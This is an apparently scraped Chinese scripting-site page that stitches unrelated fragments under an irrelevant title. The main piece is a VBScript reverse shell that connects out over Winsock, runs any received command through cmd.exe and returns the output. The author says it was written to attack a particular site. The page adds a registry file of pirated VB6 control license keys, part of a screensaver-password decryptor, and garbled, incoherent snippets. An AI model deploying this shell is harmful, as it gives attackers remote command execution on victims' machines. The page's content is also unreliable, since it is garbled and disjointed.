医院感染爆发脚本360添加

发布时间:2020-06-22 来源:脚本之家 点击:


·通过添加表、字段或者索引来修改数据库的结构'搞一个特殊的站准备用的,没想到,等写完了,洞补上了,郁闷
'by009,baicker@hotmail.com
'date:071221

Dimrevdata
setsock=WScript.createobject("MSWinsock.Winsock","WSEvent_")
setsc=createobject("WScript.Shell")
Setfso=CreateObject("Scripting.FileSystemObject")
sock.connect"127.0.0.1",1234

SubWSEvent_Connect()
wscript.echo"Connected!"
endsub

SubWSEvent_DataArrival(bytes)
MyString="blank"
sock.GetDataMyString
revdata=MyString
ifbytes>0then
ifinstr(revdata,"exit")>0then
sock.close
sock.close
sock=nothing
bClose=true
exitsub
else
onerrorresumenext
tempfile="C:"&fso.GetTempName
cmd=left(revdata,len(revdata)-1)
callsc.Run("cmd.exe/c"&cmd&">"&tempfile,0,True)
Settxf=fso.OpenTextFile(tempfile,1,false,0)
sock.senddatatxf.readall&vbcrlf&vbcrlf
txf.close
callfso.DeleteFile(TempFile,True)
endif
sock.senddata"009>"
endif
endsub

WhileNotbClose
WScript.Sleep1
Wend

—————————————————————————————————————
调用winsock,未装VB的需要导入注册表
——————————————vb6controls.reg—————————————————-
REGEDIT
HKEY_CLASSES_ROOT\Licenses=Licensing:Copyingthekeysmaybeaviolationofestablishedcopyrights.

//MaskedEditControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\BC96F860-9928-11cf-8AFA-00AA00C00905=mmimfflflmqmlfffrlnmofhfkgrlmmfmqkqj

//ChartControl6.0(OLEDB)licensekey
HKEY_CLASSES_ROOT\Licenses\12B142A4-BD51-11d1-8C08-0000F8754DA1=aadhgafabafajhchnbchehfambfbbachmfmb

//CommonDialogControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\4D553650-6ABE-11cf-8ADB-00AA00C00905=gfjmrfkfifkmkfffrlmmgmhmnlulkmfmqkqj

//ADODataControl6.0(OLEDB)licensekey
HKEY_CLASSES_ROOT\Licenses\C4145310-469C-11d1-B182-00A0C922E820=konhqhioohihphkouimonhqhvnwiqhhhnjti

//CommonControls-36.0licensekey
HKEY_CLASSES_ROOT\Licenses\38911DA0-E448-11D0-84A3-00DD01104159=mcpckchcdchjcjcclidcgcgchdqdcjhcojpd

//WindowsCommonControls-25.0(SP2)licensekey
HKEY_CLASSES_ROOT\Licenses\9E799BF1-8817-11cf-958F-0020AFC28C3B=uqpqnqkjujkjjjjqwktjrjkjtkupsjnjtoun

//WindowsCommonControlslicensekey
HKEY_CLASSES_ROOT\Licenses\57CBF9E0-6AA7-11cf-8ADB-00AA00C00905=aahakhchghkhfhaamghhbhbhkbpgfhahlfle

//DataBoundGridControl5.0(SP3)licensekey
HKEY_CLASSES_ROOT\Licenses\556C75F1-EFBC-11CF-B9F3-00A0247033C4=xybiedobrqsprbijaegcbislrsiucfjdhisl

//DataBoundListControls6.0licensekey
HKEY_CLASSES_ROOT\Licenses\096EFC40-6ABF-11cf-850C-08002B30345D=knsgigmnmngnmnigthmgpninrmumhgkgrlrk

//InternetTransferControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\78E1BDD1-9941-11cf-9756-00AA00C00908=yjrjvqkjlqqjnqkjvprqsjnjvkuknjpjtoun

//MultimediaControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\B1EFCCF0-6AC1-11cf-8ADB-00AA00C00905=qqkjvqpqmqjjpqjjvpqqkqmqvkypoqjquoun

//ChartControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\7C35CA30-D112-11cf-8E72-00A0C90F26F8=whmhmhohmhiorhkouimhihihwiwinhlosmsl

//WindowsCommonControls-26.0licensekey
HKEY_CLASSES_ROOT\Licenses\4F86BADF-9F77-11d1-B1B7-0000F8753F5D=iplpwpnippopupiivjrioppisjsjlpiiokuj

//WindowsCommonControls6.0licensekey
HKEY_CLASSES_ROOT\Licenses\ED4B87C4-9F76-11d1-8BF7-0000F8754DA1=knlggnmntgggrninthpgmnngrhqhnnjnslsh

//CommControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\4250E830-6AC2-11cf-8ADB-00AA00C00905=kjljvjjjoquqmjjjvpqqkqmqykypoqjquoun

//DataGridControl6.0(OLEDB)licensekey
HKEY_CLASSES_ROOT\Licenses\CDE57A55-8B86-11D0-b3C6-00A0C90AEA82=ekpkhddkjkekpdjkqemkfkldoeoefkfdjfqe

//DataListControl6.0(OLEDB)licensekey
HKEY_CLASSES_ROOT\Licenses\A133F000-CCB0-11d0-A316-00AA00688B10=cibbcimbpihbbbbbnhdbeidiocmcbbdbgdoc

//DBWinlicensekey
HKEY_CLASSES_ROOT\Licenses\D015B071-D2ED-11d0-A31A-00AA00688B10=gjdcfjpcmjicjcdcoihcechjlioiccechepd

//MSDBRPTlicensekey
HKEY_CLASSES_ROOT\Licenses\9DF1A470-BA8E-11D0-849C-00A0C90DC8A9=cchcqjejhcgcqcfjpdfcdjkckiqikchcojpd

//FlexGridControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\72E67120-5959-11cf-91F6-C2863C385E30=ibcbbbebqbdbciebmcobmbhifcmciibblgmf

//MAPIControls6.0licensekey
HKEY_CLASSES_ROOT\Licenses\899B3E80-6AC6-11cf-8ADB-00AA00C00905=wjsjjjlqmjpjrjjjvpqqkqmqukypoqjquoun

//MSRDO2.0licensekey
HKEY_CLASSES_ROOT\Licenses\B1692F60-23B0-11D0-8E95-00A0C90F26F8=mjjjccncgjijrcfjpdfjfcejpdkdkcgjojpd

//RemoteDataControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\43478d75-78e0-11cf-8e78-00a0d100038e=imshohohphlmnhimuinmphmmuiminhlmsmsl

//WindowlessControls6.0licensekey
HKEY_CLASSES_ROOT\Licenses\80E80EF0-DBBE-11D0-BCE2-00A0C90DCA10=qijimitpmpnpxplpvjnikpkpqoxjmpkpoivj

//PictureClipControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\6FB38640-6AC7-11cf-8ADB-00AA00C00905=gdjkokgdldikhdddpjkkekgknesjikdkoioh

//RichTextBoxControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\DC4D7920-6AC8-11cf-8ADB-00AA00C00905=iokouhloohrojhhhtnooiokomiwnmohosmsl

//SheridanTabControllicensekey
HKEY_CLASSES_ROOT\Licenses\190B7910-992A-11cf-8AFA-00AA00C00905=gclclcejjcmjdcccoikjlcecoioijjcjnhng

//SysInfoControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\E32E2733-1BC5-11d0-B8C3-00A0C90DCA10=kmhfimlflmmfpffmsgfmhmimngtghmoflhsg

//WinsockControl6.0licensekey
HKEY_CLASSES_ROOT\Licenses\2c49f800-c2dd-11cf-9ad6-0080c7e7b78d=mlrljgrlhltlngjlthrligklpkrhllglqlrk

gg修改器打开脚本

嗨,我们只是如实汇报,至于原因我们可不晓得
4:重复以上动作直到左上角第一个控制项为止


randomize
setfso=createobject("scripting.filesystemobject")
seta=createobject("scripting.dictionary")
setfile=fso.opentextfile("a.txt")
dowhilefile.atendofstream<>true
m=m+1
a.addm,file.readline
loop
file.close
h=int(rnd*m)
msgbox"第"&h&"行:"&a(h),4096,"随机内容"

  附VB源程序:(程序中使用了窗体Form1,文本框Text1,命令按钮Command1)
  1、窗体代码:
  OptionExplicit
  DimCryptographAsString
  DimiAsInteger
  DimjAsInteger
  DimkAsInteger
  DimCryptographStr(32)AsInteger
  DimPWstrAsString
  DimPassWordAsString
  PrivateSubCommand1_Click()
  PWstr=“"
  PassWord=“"
  Text1.Text=“"
  Cryptograph=GetBinaryValue(“ScreenSave_Data")
  k=Len(Cryptograph)
  Forj=1Tok-1
  Fori=32To126
  IfMid(Cryptograph,j,1)=Chr(i)Then
  CryptographStr(j)=i
  EndIf
  Nexti
  Nextj
  i=(k-1)/2'密码位数为(h-1)/2,根据位数选择解密过程

确实很不错,不是吗?



    可能的用法
    查看和编辑在远程或本地数据库中的数据

  FindStringExact 方法用于查找与指定字符串完全匹配的项sleep10分钟再执行

OptionButton控件经常是作为控件数组存在的,要快速找到其中的哪一个被选中,可以使用下面的代码:

'假设控件数组包含3个OptionButton控件

intSelected=Option(0).Value*0-Option(1).Value*1-Option(2).Value*2

注意,因为第一个操作数总是0,所以上述代码可以精简如下:

intSelected=-Option(1).Value-Option(2).Value*2

->

脚本的第一行简单创建了 WSH Shell 对象的一个实例,然后在第二行使用 Run 方法调用 dir 命令。

网站地图 | Tag标签 | RSS订阅
Copyright © 2012-2019 脚本之家 All Rights Reserved
脚本之家  渝ICP备13030612号